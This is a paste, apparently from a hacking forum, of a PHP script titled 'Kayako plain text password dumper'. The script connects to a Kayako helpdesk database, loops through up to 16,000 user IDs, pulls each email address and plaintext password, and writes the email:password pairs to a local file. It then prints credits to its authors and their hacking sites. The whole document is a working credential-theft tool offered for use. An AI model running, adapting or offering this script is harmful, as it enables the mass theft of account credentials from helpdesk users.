
kayako plain text password dumper

Feb 21st, 2012
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PHP 1.24 KB | None | 0 0
  1. <?
  2. //Kayako plain text PWD dumper
  3. //Coded By Karar & i-Hmx
  4. //sec4ever.com , 1337s.cc , alm3refh.com
  5. //some pastes > http://pastebin.com/u/i-Hmx
  6. // Database info
  7. $host='localhost'; // Host
  8. $user='username'; // username
  9. $pass='password'; // password
  10. $db='database'; // database name
  11. $num="16000"; // number of users to be dumped
  12. $file="faris.sub"; // file where Data will Be dumped
  13. //
  14. #############!!!Game start!!!#############
  15. //
  16. mysql_connect($host,$user,$pass) or die(mysql_error());
  17. mysql_select_db($db);
  18. $f = fopen($file, 'w+');
  19. for($faris=1;$faris<$num;$faris++)
  20. {
  21. $fa = mysql_query("SELECT * FROM swuseremails where userid=".$faris."") or die(mysql_error());
  22. while ($email = mysql_fetch_array($fa)){
  23. $mail=$email["email"];
  24. echo "$mail";
  25. fwrite($f,"".$mail.":");
  26. }
  27. $sql = mysql_query("SELECT * FROM swusers where userid=".$faris."") or die(mysql_error());
  28. while ($pwd = mysql_fetch_array($sql)){
  29. $password=$pwd["userpasswordtxt"];
  30. echo ":$password\n";
  31. fwrite($f,"".$password."\n");
  32. }
  33. }
  34. echo "\n| data was dumped successfully > $file\n";
  35. echo "| Kayako Plain text dumper<br>";
  36. echo "| Coded By HaCKeR-MaN<br>";
  37. echo "| faris_romantic2000@yahoo.com<br>";
  38. echo "| sec4ever.com - 1337r1z.wordpress.com<br>";
  39. echo "./faris";
  40. # EOF
  41. ?>
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